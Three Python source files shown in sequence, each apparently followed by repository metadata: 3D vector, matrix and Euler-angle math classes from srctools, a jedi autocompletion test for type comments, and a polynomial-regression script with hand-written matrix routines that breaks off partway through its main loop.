return self.z
raise KeyError(f'Invalid axis: {ind!r}')
def __setitem__(self, ind: Union[str, int], val: float) -> None:
"""Allow editing values by index instead of name if desired.
This accepts either 0,1,2 or 'x','y','z' to edit values.
Useful in conjunction with a loop to apply commands to all values.
"""
if ind == 0 or ind == "x":
self.x = float(val)
elif ind == 1 or ind == "y":
self.y = float(val)
elif ind == 2 or ind == "z":
self.z = float(val)
else:
raise KeyError(f'Invalid axis: {ind!r}')
def in_bbox(self, a: AnyVec, b: 'Vec') -> bool:
"""Check if this point is inside the specified bounding box."""
return (
min(a[0], b[0]) <= self.x <= max(a[0], b[0]) and
min(a[1], b[1]) <= self.y <= max(a[1], b[1]) and
min(a[2], b[2]) <= self.z <= max(a[2], b[2])
)
def other_axes(self, axis: str) -> Tuple[float, float]:
"""Get the values for the other two axes."""
if axis == 'x':
return self.y, self.z
if axis == 'y':
return self.x, self.z
if axis == 'z':
return self.x, self.y
raise KeyError('Bad axis "{}"'.format(axis))
def as_tuple(self) -> Vec_tuple:
"""Return the Vector as a tuple."""
return Vec_tuple(round(self.x, 6), round(self.y, 6), round(self.z, 6))
def len_sq(self) -> float:
"""Return the magnitude squared, which is slightly faster."""
return self.x**2 + self.y**2 + self.z**2
def __len__(self) -> int:
"""The len() of a vector is the number of non-zero axes."""
return (
(abs(self.x) > 1e-6) +
(abs(self.y) > 1e-6) +
(abs(self.z) > 1e-6)
)
def __contains__(self, val: float) -> bool:
"""Check to see if an axis is set to the given value.
"""
return abs(val - self.x) < 1e-6 or abs(val - self.y) < 1e-6 or abs(val - self.z) < 1e-6
def __neg__(self) -> 'Vec':
"""The inverted form of a Vector has inverted axes."""
return Py_Vec(-self.x, -self.y, -self.z)
def __pos__(self) -> 'Vec':
"""+ on a Vector simply copies it."""
return Py_Vec(self.x, self.y, self.z)
def norm(self) -> 'Vec':
"""Normalise the Vector.
This is done by transforming it to have a magnitude of 1 but the same
direction.
The vector is left unchanged if it is equal to (0,0,0)
"""
if self.x == 0 and self.y == 0 and self.z == 0:
# Don't do anything for this - otherwise we'd get division
# by zero errors - we want this to be a valid normal!
return self.copy()
else:
# Adding 0 clears -0 values - we don't want those.
val = self / self.mag()
val += 0
return val
def dot(self, other: AnyVec) -> float:
"""Return the dot product of both Vectors."""
return (
self.x * other[0] +
self.y * other[1] +
self.z * other[2]
)
def cross(self, other: AnyVec) -> 'Vec':
"""Return the cross product of both Vectors."""
return Py_Vec(
self.y * other[2] - self.z * other[1],
self.z * other[0] - self.x * other[2],
self.x * other[1] - self.y * other[0],
)
def localise(
self,
origin: Union['Vec', Tuple3],
angles: Union['Angle', 'Matrix']=None,
) -> None:
"""Shift this point to be local to the given position and angles.
This effectively translates local-space offsets to a global location,
given the parent's origin and angles.
"""
mat = to_matrix(angles)
mat._vec_rot(self)
self += origin
def norm_mask(self, normal: 'Vec') -> 'Vec':
"""Subtract the components of this vector not in the direction of the normal.
If the normal is axis-aligned, this will zero out the other axes.
If not axis-aligned, it will do the equivalent.
"""
norm = normal.norm()
return norm * self.dot(norm)
len = mag
mag_sq = len_sq
@contextlib.contextmanager
def transform(self) -> Iterator['Matrix']:
"""Perform rotations on this Vector efficiently.
Used as a context manager, which returns a matrix.
When the body is exited safely, the matrix is applied to
the angle.
"""
mat = Py_Matrix()
yield mat
mat._vec_rot(self)
_IND_TO_SLOT = {
(x, y): f'_{chr(ord("a")+x)}{chr(ord("a")+y)}'
for x in (0, 1, 2)
for y in (0, 1, 2)
}
class Matrix:
"""Represents a matrix via a transformation matrix."""
__slots__ = [
'_aa', '_ab', '_ac',
'_ba', '_bb', '_bc',
'_ca', '_cb', '_cc'
]
def __init__(self) -> None:
"""Create a matrix set to the identity transform."""
self._aa, self._ab, self._ac = 1.0, 0.0, 0.0
self._ba, self._bb, self._bc = 0.0, 1.0, 0.0
self._ca, self._cb, self._cc = 0.0, 0.0, 1.0
def __eq__(self, other: object) -> bool:
if isinstance(other, Py_Matrix):
return (
self._aa == other._aa and self._ab == other._ab and self._ac == other._ac and
self._ba == other._ba and self._bb == other._bb and self._bc == other._bc and
self._ca == other._ca and self._cb == other._cb and self._cc == other._cc
)
return NotImplemented
def __repr__(self) -> str:
return (
'<Matrix '
f'{self._aa:.3} {self._ab:.3} {self._ac:.3}, '
f'{self._ba:.3} {self._bb:.3} {self._bc:.3}, '
f'{self._ca:.3} {self._cb:.3} {self._cc:.3}'
'>'
)
def copy(self) -> 'Matrix':
"""Duplicate this matrix."""
rot = Py_Matrix.__new__(Py_Matrix)
rot._aa, rot._ab, rot._ac = self._aa, self._ab, self._ac
rot._ba, rot._bb, rot._bc = self._ba, self._bb, self._bc
rot._ca, rot._cb, rot._cc = self._ca, self._cb, self._cc
return rot
def __reduce__(self) -> tuple:
"""Pickling support.
This redirects to a global function, so C/Python versions
interoperate.
"""
return (_mk_mat, (
self._aa, self._ab, self._ac,
self._ba, self._bb, self._bc,
self._ca, self._cb, self._cc
))
@classmethod
def from_pitch(cls: Type['Matrix'], pitch: float) -> 'Matrix':
"""Return the matrix representing a pitch rotation.
This is a rotation around the Y axis.
"""
rad_pitch = math.radians(pitch)
cos = math.cos(rad_pitch)
sin = math.sin(rad_pitch)
rot: Matrix = cls.__new__(cls)
rot._aa, rot._ab, rot._ac = cos, 0.0, -sin
rot._ba, rot._bb, rot._bc = 0.0, 1.0, 0.0
rot._ca, rot._cb, rot._cc = sin, 0.0, cos
return rot
@classmethod
def from_yaw(cls: Type['Matrix'], yaw: float) -> 'Matrix':
"""Return the matrix representing a yaw rotation.
"""
rad_yaw = math.radians(yaw)
sin = math.sin(rad_yaw)
cos = math.cos(rad_yaw)
rot: Matrix = cls.__new__(cls)
rot._aa, rot._ab, rot._ac = cos, sin, 0.0
rot._ba, rot._bb, rot._bc = -sin, cos, 0.0
rot._ca, rot._cb, rot._cc = 0.0, 0.0, 1.0
return rot
@classmethod
def from_roll(cls: Type['Matrix'], roll: float) -> 'Matrix':
"""Return the matrix representing a roll rotation.
This is a rotation around the X axis.
"""
rad_roll = math.radians(roll)
cos_r = math.cos(rad_roll)
sin_r = math.sin(rad_roll)
rot: Matrix = cls.__new__(cls)
rot._aa, rot._ab, rot._ac = 1.0, 0.0, 0.0
rot._ba, rot._bb, rot._bc = 0.0, cos_r, sin_r
rot._ca, rot._cb, rot._cc = 0.0, -sin_r, cos_r
return rot
@classmethod
@overload
def from_angle(cls, __angle: 'Angle') -> 'Matrix': ...
@classmethod
@overload
def from_angle(cls, pitch: float, yaw: float, roll: float) -> 'Matrix': ...
@classmethod
def from_angle(
cls,
pitch: Union['Angle', float],
yaw: Optional[float]=0.0,
roll: Optional[float]=None,
) -> 'Matrix':
"""Return the rotation representing an Euler angle.
Either an Angle can be passed, or the raw pitch/yaw/roll angles.
"""
if isinstance(pitch, Py_Angle):
rad_pitch = math.radians(pitch.pitch)
rad_yaw = math.radians(pitch.yaw)
rad_roll = math.radians(pitch.roll)
elif yaw is None or roll is None:
raise TypeError('Matrix.from_angles() accepts a single Angle or 3 floats!')
else:
rad_pitch = math.radians(pitch)
rad_yaw = math.radians(yaw)
rad_roll = math.radians(roll)
cos_p = math.cos(rad_pitch)
sin_p = math.sin(rad_pitch)
sin_y = math.sin(rad_yaw)
cos_y = math.cos(rad_yaw)
cos_r = math.cos(rad_roll)
sin_r = math.sin(rad_roll)
rot = Py_Matrix.__new__(Py_Matrix)
rot._aa = cos_p * cos_y
rot._ab = cos_p * sin_y
rot._ac = -sin_p
cos_r_cos_y = cos_r * cos_y
cos_r_sin_y = cos_r * sin_y
sin_r_cos_y = sin_r * cos_y
sin_r_sin_y = sin_r * sin_y
rot._ba = sin_p * sin_r_cos_y - cos_r_sin_y
rot._bb = sin_p * sin_r_sin_y + cos_r_cos_y
rot._bc = sin_r * cos_p
rot._ca = (sin_p * cos_r_cos_y + sin_r_sin_y)
rot._cb = (sin_p * cos_r_sin_y - sin_r_cos_y)
rot._cc = cos_r * cos_p
return rot
@classmethod
def axis_angle(cls, axis: Union[Vec, Tuple3], angle: float) -> 'Matrix':
"""Compute the rotation matrix forming a rotation around an axis by a specific angle."""
x, y, z = Vec(axis).norm()
# Invert, so it matches the orientation of Angles().
angle_rad = -math.radians(angle)
cos = math.cos(angle_rad)
icos = 1 - cos
sin = math.sin(angle_rad)
mat = Py_Matrix.__new__(Py_Matrix)
mat._aa = x*x * icos + cos
mat._ab = x*y * icos - z*sin
mat._ac = x*z * icos + y*sin
mat._ba = y*x * icos + z*sin
mat._bb = y*y * icos + cos
mat._bc = y*z * icos - x*sin
mat._ca = z*x * icos - y*sin
mat._cb = z*y * icos + x*sin
mat._cc = z*z * icos + cos
return mat
def forward(self) -> 'Vec':
"""Return a normalised vector pointing in the +X direction."""
return Py_Vec(self._aa, self._ab, self._ac)
def left(self) -> 'Vec':
"""Return a normalised vector pointing in the +Y direction."""
return Py_Vec(self._ba, self._bb, self._bc)
def up(self) -> 'Vec':
"""Return a normalised vector pointing in the +Z direction."""
return Py_Vec(self._ca, self._cb, self._cc)
def __getitem__(self, item: Tuple[int, int]) -> float:
"""Retrieve an individual matrix value by x, y position (0-2)."""
return getattr(self, _IND_TO_SLOT[item])
def __setitem__(self, item: Tuple[int, int], value: float) -> None:
"""Set an individual matrix value by x, y position (0-2)."""
setattr(self, _IND_TO_SLOT[item], value)
def to_angle(self) -> 'Angle':
"""Return an Euler angle replicating this rotation."""
# https://github.com/ValveSoftware/source-sdk-2013/blob/master/sp/src/mathlib/mathlib_base.cpp#L208
for_x = self._aa
for_y = self._ab
for_z = self._ac
left_x = self._ba
left_y = self._bb
left_z = self._bc
# up_x = self.ca
# up_y = self.cb
up_z = self._cc
horiz_dist = math.sqrt(for_x**2 + for_y**2)
if horiz_dist > 0.001:
return Py_Angle(
yaw=math.degrees(math.atan2(for_y, for_x)),
pitch=math.degrees(math.atan2(-for_z, horiz_dist)),
roll=math.degrees(math.atan2(left_z, up_z)),
)
else:
# Vertical, gimbal lock (yaw=roll)...
return Py_Angle(
yaw=math.degrees(math.atan2(-left_x, left_y)),
pitch=math.degrees(math.atan2(-for_z, horiz_dist)),
roll=0, # Can't produce.
)
def transpose(self) -> 'Matrix':
"""Return the transpose of this matrix."""
rot = Py_Matrix.__new__(Py_Matrix)
rot._aa, rot._ab, rot._ac = self._aa, self._ba, self._ca
rot._ba, rot._bb, rot._bc = self._ab, self._bb, self._cb
rot._ca, rot._cb, rot._cc = self._ac, self._bc, self._cc
return rot
@classmethod
@overload
def from_basis(cls, *, x: Vec, y: Vec, z: Vec) -> 'Matrix': ...
@classmethod
@overload
def from_basis(cls, *, x: Vec, y: Vec) -> 'Matrix': ...
@classmethod
@overload
def from_basis(cls, *, y: Vec, z: Vec) -> 'Matrix': ...
@classmethod
@overload
def from_basis(cls, *, x: Vec, z: Vec) -> 'Matrix': ...
@classmethod
def from_basis(
cls, *,
x: Vec=None,
y: Vec=None,
z: Vec=None,
) -> 'Matrix':
"""Construct a matrix from at least two basis vectors.
The third is computed, if not provided.
"""
if x is None and y is not None and z is not None:
x = Vec.cross(y, z)
elif y is None and x is not None and z is not None:
y = Vec.cross(z, x)
elif z is None and x is not None and y is not None:
z = Vec.cross(x, y)
if x is None or y is None or z is None:
raise TypeError('At least two vectors must be provided!')
mat: Matrix = cls.__new__(cls)
mat._aa, mat._ab, mat._ac = x.norm()
mat._ba, mat._bb, mat._bc = y.norm()
mat._ca, mat._cb, mat._cc = z.norm()
return mat
@overload
def __matmul__(self, other: 'Matrix') -> 'Matrix': ...
@overload
def __matmul__(self, other: 'Angle') -> 'Matrix': ...
def __matmul__(self, other: 'Matrix | Angle') -> 'Matrix':
if isinstance(other, Py_Matrix):
mat = self.copy()
mat._mat_mul(other)
return mat
elif isinstance(other, Py_Angle):
mat = self.copy()
mat._mat_mul(Py_Matrix.from_angle(other))
return mat
else:
return NotImplemented
@overload
def __rmatmul__(self, other: Vec) -> Vec: ...
@overload
def __rmatmul__(self, other: 'Matrix') -> 'Matrix': ...
@overload
def __rmatmul__(self, other: 'Angle') -> 'Angle': ...
def __rmatmul__(self, other):
if isinstance(other, Py_Vec):
result = other.copy()
self._vec_rot(result)
return result
elif isinstance(other, Py_Angle):
mat = Py_Matrix.from_angle(other)
mat._mat_mul(self)
return mat.to_angle()
elif isinstance(other, Py_Matrix):
mat = other.copy()
mat._mat_mul(self)
return mat
else:
return NotImplemented
@overload
def __imatmul__(self, other: 'Matrix') -> 'Matrix': ...
@overload
def __imatmul__(self, other: 'Angle') -> 'Matrix': ...
def __imatmul__(self, other: 'Matrix | Angle') -> 'Matrix':
if isinstance(other, Py_Matrix):
self._mat_mul(other)
return self
elif isinstance(other, Py_Angle):
self._mat_mul(Py_Matrix.from_angle(other))
return self
else:
return NotImplemented
def _mat_mul(self, other: 'Matrix') -> None:
"""Rotate myself by the other matrix."""
# We don't use each row after assigning to the set, so we can re-assign.
# 3-tuple unpacking is optimised.
self._aa, self._ab, self._ac = (
self._aa * other._aa + self._ab * other._ba + self._ac * other._ca,
self._aa * other._ab + self._ab * other._bb + self._ac * other._cb,
self._aa * other._ac + self._ab * other._bc + self._ac * other._cc,
)
self._ba, self._bb, self._bc = (
self._ba * other._aa + self._bb * other._ba + self._bc * other._ca,
self._ba * other._ab + self._bb * other._bb + self._bc * other._cb,
self._ba * other._ac + self._bb * other._bc + self._bc * other._cc,
)
self._ca, self._cb, self._cc = (
self._ca * other._aa + self._cb * other._ba + self._cc * other._ca,
self._ca * other._ab + self._cb * other._bb + self._cc * other._cb,
self._ca * other._ac + self._cb * other._bc + self._cc * other._cc,
)
def _vec_rot(self, vec: Vec) -> None:
"""Rotate a vector by our value."""
x = vec.x
y = vec.y
z = vec.z
vec.x = (x * self._aa) + (y * self._ba) + (z * self._ca)
vec.y = (x * self._ab) + (y * self._bb) + (z * self._cb)
vec.z = (x * self._ac) + (y * self._bc) + (z * self._cc)
class Angle:
"""Represents a pitch-yaw-roll Euler angle.
All values are remapped to between 0-360 when set.
Addition and subtraction modify values, matrix-multiplication with
Vec, Angle or Matrix rotates (RHS rotating LHS).
"""
# We have to double-modulus because -1e-14 % 360.0 = 360.0.
__slots__ = ['_pitch', '_yaw', '_roll']
def __init__(
self,
pitch: Union[int, float, Iterable[Union[int, float]]]=0.0,
yaw: Union[int, float]=0.0,
roll: Union[int, float]=0.0,
) -> None:
"""Create an Angle.
All values are converted to Floats automatically.
If no value is given, that axis will be set to 0.
An iterable can be passed in (as the pitch argument), which will be
used for pitch, yaw, and roll. This includes Vectors and other Angles.
"""
if isinstance(pitch, (int, float)):
self._pitch = float(pitch) % 360 % 360
self._yaw = float(yaw) % 360 % 360
self._roll = float(roll) % 360 % 360
else:
it = iter(pitch)
self._pitch = float(next(it, 0.0)) % 360 % 360
self._yaw = float(next(it, yaw)) % 360 % 360
self._roll = float(next(it, roll)) % 360 % 360
def copy(self) -> 'Angle':
"""Create a duplicate of this vector."""
return Py_Angle(self._pitch, self._yaw, self._roll)
__copy__ = copy
def __reduce__(self) -> tuple:
"""Pickling support.
This redirects to a global function, so C/Python versions
interoperate.
"""
return _mk_ang, (self._pitch, self._yaw, self._roll)
@classmethod
def from_str(cls, val: Union[str, 'Angle'], pitch=0.0, yaw=0.0, roll=0.0):
"""Convert a string in the form '(4 6 -4)' into an Angle.
If the string is unparsable, this uses the defaults.
The string can start with any of the (), {}, [], <> bracket
types, or none.
If the value is already a Angle, a copy will be returned.
"""
pitch, yaw, roll = Py_parse_vec_str(val, pitch, yaw, roll)
return cls(pitch, yaw, roll)
@property
def pitch(self) -> float:
"""The Y-axis rotation, performed second."""
return self._pitch
@pitch.setter
def pitch(self, pitch: float) -> None:
self._pitch = float(pitch) % 360 % 360
@property
def yaw(self) -> float:
"""The Z-axis rotation, performed last."""
return self._yaw
@yaw.setter
def yaw(self, yaw: float) -> None:
self._yaw = float(yaw) % 360 % 360
@property
def roll(self) -> float:
"""The X-axis rotation, performed first."""
return self._roll
@roll.setter
def roll(self, roll: float) -> None:
self._roll = float(roll) % 360 % 360
def join(self, delim: str=', ') -> str:
"""Return a string with all numbers joined by the passed delimiter.
This strips off the .0 if no decimal portion exists.
"""
# :g strips the .0 off of floats if it's an integer.
return f'{self._pitch:g}{delim}{self._yaw:g}{delim}{self._roll:g}'
def __str__(self) -> str:
"""Return the values, separated by spaces.
This is the main format in Valve's file formats, though identical to
vectors.
This strips off the .0 if no decimal portion exists.
"""
return f"{self._pitch:g} {self._yaw:g} {self._roll:g}"
def __repr__(self) -> str:
return f'Angle({self._pitch:g}, {self._yaw:g}, {self._roll:g})'
def __format__(self, format_spec: str) -> str:
"""Control how the text is formatted."""
if not format_spec:
format_spec = 'g'
return f"{self._pitch:{format_spec}} {self._yaw:{format_spec}} {self._roll:{format_spec}}"
def as_tuple(self) -> Tuple[float, float, float]:
"""Return the Angle as a tuple."""
return Vec_tuple(self._pitch, self._yaw, self._roll)
def __iter__(self) -> Iterator[float]:
"""Iterating over the angles returns each value in turn."""
yield self._pitch
yield self._yaw
yield self._roll
@classmethod
@overload
def with_axes(cls, axis1: str, val1: Union[float, 'Angle']) -> 'Angle':
...
@classmethod
@overload
def with_axes(
cls,
axis1: str, val1: Union[float, 'Angle'],
axis2: str, val2: Union[float, 'Angle'],
) -> 'Angle':
...
@classmethod
@overload
def with_axes(
cls,
axis1: str, val1: Union[float, 'Angle'],
axis2: str, val2: Union[float, 'Angle'],
axis3: str, val3: Union[float, 'Angle'],
) -> 'Angle':
...
@classmethod
def with_axes(
cls,
axis1: str,
val1: Union[float, 'Angle'],
axis2: str = None,
val2: Union[float, 'Angle'] = 0.0,
axis3: str = None,
val3: Union[float, 'Angle'] = 0.0,
) -> 'Angle':
"""Create an Angle, given a number of axes and corresponding values.
This is a convenience for doing the following:
ang = Angle()
ang[axis1] = val1
ang[axis2] = val2
ang[axis3] = val3
The magnitudes can also be Angles, in which case the matching
axis will be used from the angle.
"""
ang = cls()
ang[axis1] = val1[axis1] if isinstance(val1, Py_Angle) else val1
if axis2 is not None:
ang[axis2] = val2[axis2] if isinstance(val2, Py_Angle) else val2
if axis3 is not None:
ang[axis3] = val3[axis3] if isinstance(val3, Py_Angle) else val3
return ang
@classmethod
@overload
def from_basis(cls, *, x: Vec, y: Vec, z: Vec) -> 'Angle': ...
@classmethod
@overload
def from_basis(cls, *, x: Vec, y: Vec) -> 'Angle': ...
@classmethod
@overload
def from_basis(cls, *, y: Vec, z: Vec) -> 'Angle': ...
@classmethod
@overload
def from_basis(cls, *, x: Vec, z: Vec) -> 'Angle': ...
@classmethod
def from_basis(cls, **kwargs) -> 'Angle':
"""Return the rotation which results in the specified local axes.
At least two must be specified, with the third computed if necessary.
"""
return Py_Matrix.from_basis(**kwargs).to_angle()
def __getitem__(self, ind: Union[str, int]) -> float:
"""Allow reading values by index instead of name if desired.
This accepts the following indexes to read values:
- 0, 1, 2
- pitch, yaw, roll
- pit, yaw, rol
- p, y, r
Useful in conjunction with a loop to apply commands to all values.
"""
if ind in (0, 'p', 'pit', 'pitch'):
return self._pitch
elif ind in (1, 'y', 'yaw'):
return self._yaw
elif ind in (2, 'r', 'rol', 'roll'):
return self._roll
raise KeyError('Invalid axis: {!r}'.format(ind))
def __setitem__(self, ind: Union[str, int], val: float) -> None:
"""Allow editing values by index instead of name if desired.
This accepts either 0,1,2 or 'x','y','z' to edit values.
Useful in conjunction with a loop to apply commands to all values.
"""
if ind in (0, 'p', 'pit', 'pitch'):
self._pitch = float(val) % 360.0 % 360.0
elif ind in (1, 'y', 'yaw'):
self._yaw = float(val) % 360.0 % 360.0
elif ind in (2, 'r', 'rol', 'roll'):
self._roll = float(val) % 360.0 % 360.0
else:
raise KeyError('Invalid axis: {!r}'.format(ind))
def __eq__(self, other: object) -> bool:
"""== test.
Two Angles are equal if all three axes are the same.
An Angle can be compared with a 3-tuple as if it was a Angle also.
A tolerance of 1e-6 is accounted for automatically.
"""
if isinstance(other, Py_Angle):
return (
abs(other._pitch - self._pitch) <= 1e-6 and
abs(other._yaw - self._yaw) <= 1e-6 and
abs(other._roll - self._roll) <= 1e-6
)
elif isinstance(other, tuple) and len(other) == 3:
pit = other[0] % 360.0 % 360.0
yaw = other[1] % 360.0 % 360.0
rol = other[2] % 360.0 % 360.0
return (
abs(self._pitch - pit) <= 1e-6 and
abs(self._yaw - yaw) <= 1e-6 and
abs(self._roll - rol) <= 1e-6
)
else:
return NotImplemented
def __ne__(self, other: object) -> bool:
"""!= test.
Two Angles are equal if all three axes are the same.
An Angle can be compared with a 3-tuple as if it was a Angle also.
A tolerance of 1e-6 is accounted for automatically.
"""
if isinstance(other, Py_Angle):
return (
abs(other._pitch - self._pitch) > 1e-6 or
abs(other._yaw - self._yaw) > 1e-6 or
abs(other._roll - self._roll) > 1e-6
)
elif isinstance(other, tuple) and len(other) == 3:
pit = other[0] % 360.0 % 360.0
yaw = other[1] % 360.0 % 360.0
rol = other[2] % 360.0 % 360.0
return (
abs(self._pitch - pit) > 1e-6 or
abs(self._yaw - yaw) > 1e-6 or
abs(self._roll - rol) > 1e-6
)
else:
return NotImplemented
# No ordering, there isn't any sensible relationship.
def __mul__(self, other: Union[int, float]) -> 'Angle':
"""Angle * float multiplies each value."""
if isinstance(other, (int, float)):
return Py_Angle(
self._pitch * other,
self._yaw * other,
self._roll * other,
)
return NotImplemented
def __rmul__(self, other: Union[int, float]) -> 'Angle':
"""Angle * float multiplies each value."""
if isinstance(other, (int, float)):
return Py_Angle(
other * self._pitch,
other * self._yaw,
other * self._roll,
)
return NotImplemented
def __matmul__(self, other: 'Angle') -> 'Angle':
"""Angle @ Angle rotates the first by the second.
"""
if isinstance(other, Py_Angle):
return other._rotate_angle(self)
else:
return NotImplemented
@overload
def __rmatmul__(self, other: 'Angle') -> 'Angle': ...
@overload
def __rmatmul__(self, other: 'Vec') -> 'Vec': ...
def __rmatmul__(self, other):
"""Vec @ Angle rotates the first by the second."""
if isinstance(other, Py_Vec):
return other @ Py_Matrix.from_angle(self)
elif isinstance(other, Py_Angle):
# Should always be done by __mul__!
return self._rotate_angle(other)
return NotImplemented
def _rotate_angle(self, target: 'Angle') -> 'Angle':
"""Rotate the target by this angle.
Inefficient if we have more than one rotation to do.
"""
mat = Py_Matrix.from_angle(target)
mat @= self
return mat.to_angle()
@contextlib.contextmanager
def transform(self) -> Iterator[Matrix]:
"""Perform transformations on this angle.
Used as a context manager, which returns a matrix.
When the body is exited safely, the matrix is applied to
the angle.
"""
mat = Py_Matrix.from_angle(self)
yield mat
new_ang = mat.to_angle()
self._pitch = new_ang._pitch
self._yaw = new_ang._yaw
self._roll = new_ang._roll
def _mk_vec(x: float, y: float, z: float) -> Vec:
"""Unpickle a Vec object, maintaining compatibility with C versions.
Shortened name shrinks the data size.
"""
# Skip __init__'s checks and coercion/iteration.
v = Vec.__new__(Vec)
v.x = x
v.y = y
v.z = z
return v
def _mk_ang(pitch: float, yaw: float, roll: float) -> Angle:
"""Unpickle an Angle object, maintaining compatibility with C versions.
Shortened name shrinks the data size.
"""
# Skip __init__'s checks and coercion/iteration.
ang = Angle.__new__(Angle)
ang.pitch = pitch
ang.yaw = yaw
ang.roll = roll
return ang
def _mk_mat(
aa: float, ab: float, ac: float,
ba: float, bb: float, bc: float,
ca: float, cb: float, cc: float,
) -> Matrix:
"""Unpickle a Matrix object, maintaining compatibility with C versions.
Shortened name shrinks the data size.
"""
# Skip __init__'s checks and coercion/iteration.
mat = Matrix.__new__(Matrix)
mat[0, 0] = aa
mat[0, 1] = ab
mat[0, 2] = ac
mat[1, 0] = ba
mat[1, 1] = bb
mat[1, 2] = bc
mat[2, 0] = ca
mat[2, 1] = cb
mat[2, 2] = cc
return mat
# Older name.
_mk = _mk_vec
# A little dance to import both the Cython and Python versions,
# and choose an appropriate unprefixed version.
Cy_Vec = Py_Vec = Vec
Cy_parse_vec_str = Py_parse_vec_str = parse_vec_str
Cy_to_matrix = Py_to_matrix = to_matrix
Cy_lerp = Py_lerp = lerp
Cy_Angle = Py_Angle = Angle
Cy_Matrix = Py_Matrix = Matrix
# Do it this way, so static analysis ignores this.
_glob = globals()
del _glob['SupportsRound']
try:
from srctools import _math # type: ignore
except ImportError:
pass
else:
for _name in ['Vec', 'Angle', 'Matrix', 'parse_vec_str', 'to_matrix', 'lerp']:
_glob[_name] = _glob['Cy_' + _name] = getattr(_math, _name)
del _glob, _name, _math
| {
"repo_name": "TeamSpen210/srctools",
"path": "srctools/math.py",
"copies": "1",
"size": "59679",
"license": "unlicense",
"hash": -2966240907222309400,
"line_mean": 31.6650246305,
"line_max": 107,
"alpha_frac": 0.5255449991,
"autogenerated": false,
"ratio": 3.5210926898342083,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4546637688934208,
"avg_score": null,
"num_lines": null
} |
a = 3 # type: str
#? str()
a
b = 3 # type: str but I write more
#? int()
b
c = 3 # type: str # I comment more
#? str()
c
d = "It should not read comments from the next line"
# type: int
#? str()
d
# type: int
e = "It should not read comments from the previous line"
#? str()
e
class BB: pass
def test(a, b):
a = a # type: BB
c = a # type: str
d = a
# type: str
e = a # type: str # Should ignore long whitespace
#? BB()
a
#? str()
c
#? BB()
d
#? str()
e
a,b = 1, 2 # type: str, float
#? str()
a
#? float()
b
class Employee:
pass
# The typing library is not installable for Python 2.6, therefore ignore the
# following tests.
# python >= 2.7
from typing import List
x = [] # type: List[Employee]
#? Employee()
x[1]
x, y, z = [], [], [] # type: List[int], List[int], List[str]
#? int()
y[2]
x, y, z = [], [], [] # type: (List[float], List[float], List[BB])
for zi in z:
#? BB()
zi
x = [
1,
2,
] # type: List[str]
#? str()
x[1]
for bar in foo(): # type: str
#? str()
bar
for bar, baz in foo(): # type: int, float
#? int()
bar
#? float()
baz
for bar, baz in foo():
# type: str, str
""" type hinting on next line should not work """
#?
bar
#?
baz
with foo(): # type: int
...
with foo() as f: # type: str
#? str()
f
with foo() as f:
# type: str
""" type hinting on next line should not work """
#?
f
aaa = some_extremely_long_function_name_that_doesnt_leave_room_for_hints() \
# type: float # We should be able to put hints on the next line with a \
#? float()
aaa
| {
"repo_name": "NcLang/vimrc",
"path": "sources_non_forked/YouCompleteMe/third_party/ycmd/third_party/JediHTTP/vendor/jedi/test/completion/pep0484_comments.py",
"copies": "2",
"size": "1669",
"license": "mit",
"hash": -6595779478990166000,
"line_mean": 14.3119266055,
"line_max": 79,
"alpha_frac": 0.5176752546,
"autogenerated": false,
"ratio": 2.727124183006536,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4244799437606536,
"avg_score": null,
"num_lines": null
} |
a = [-5,9]
b = [-4,7]
c = [-3,4]
d = [-2,2]
e = [-1,1]
f = [0,0]
g = [1,1]
h = [2,2]
i = [3,4]
j = [4,7]
k = [5,9]
l = [6,12]
A = [a,b,c,d,e,f,g,h,i,j,k,l]
def Transpose(A):
l1=[]
for i in range(len(A[0])):
l2=[]
for j in range(len(A)):
value = A[j][i]
l2.append(value)
l1.append(l2)
return l1
first = [l,i,e,b]
second = [d,j,f,a]
third = [h,c,g,k]
c1 = first + second
c2 = first + third
c3 = second + third
train = [c1,c2,c3]
test = [third,second,first]
def poly(A,degree):
if degree > 0:
degree -= 1
return A*poly(A,degree)
else:
return 1
def function(A,degree):
l2 = []
for i in range(len(A)):
l1 = []
l1.append(1)
for j in range(1,degree + 1):
l1.append(poly(A[i][0],j))
l2.append(l1)
return l2
def squared_error(test_y, output):
error = 0
for i in range(len(output)):
error += (test_y[i][1]-output[i])**2
# print("{}\n".format(error))
return error
def test_y(test_y,coef,order):
l1 = []
for i in test_y:
y = 0
for j in range(order+1):
y += coef[j][0]*poly(i[0],j)
l1.append(y)
return l1
def Matrix_multip(A, B):
try:
A_column_lengh = len(A[0])
except:
A_column_lengh = 1
try:
B_column_lengh = len(B[0])
except:
B_column_lengh = 1
if (A_column_lengh) == (len(B)):
l2 = []
for i in range(len(A)):
l2.append(Single_row_multip(A[i],B,B_column_lengh))
return l2
else:
print('No valid multiplication')
return
def Single_row_multip(row, B, Bl):
l1 = []
if Bl == 1:
sum = 0
for i in range(len(B)):
b = B[i][0]
a = row[i]
sum += a * b
l1.append(sum)
else:
for j in range(Bl):
sum = 0
for i in range(len(B)):
sum += row[i] * B[i][j]
l1.append(sum)
return l1
def Vector_b(A):
l2 = []
for i in range(len(A)):
l1 = []
l1.append(float(A[i][1]))
l2.append(l1)
return l2
def Adjoin(A,order):
pivot = len(A)
for i in range(order+1):
for j in range(order+1):
A[i].append(0)
for i in range(order+1):
A[i][i+pivot] = 1
return A
def Inverse(A,order):
for pivot in range(order+1):
for i in range(order+1):
temp = A[i][pivot]
for j in range((order+1)*2):
A[i][j] /= temp
for i in range(order+1):
if i != pivot:
for j in range((order+1)*2):
A[i][j] -= A[pivot][j]
for pivot in range(order+1):
temp = A[pivot][pivot]
for i in range(len(A[0])):
A[pivot][i] /= temp
l1=[]
for i in range(order+1):
l2=[]
for j in range(order+1):
value = A[i][j+order+1]
l2.append(value)
l1.append(l2)
return l1
def show(A):
for i in range(len(A)):
print(A[i])
print("\n")
def main(train,test):
first_assignment = True
for order in range(1,8):
error = 0
count = 0
for j in train:
c = j
b = Vector_b(c)
# show(b)
c1 = function(c,order)
# show(c1)
c1t = Transpose(c1)
# show(c1t)
c1m = Matrix_multip(c1t,c1)
# show(c1m)
c1a = Adjoin(c1m,order)
# show(c1a)
ci = Inverse(c1m,order)
# show(ci)
cs = Matrix_multip(c1t,b)
# show(cs)
x = Matrix_multip(ci,cs)
# show(x)
i = test[count]
output_y = test_y(i,x,order)
# show(output_y)
error += squared_error(i,output_y)
count += 1
mean_error = error/len(test)
if first_assignment:
smallest = mean_error
best_order = order
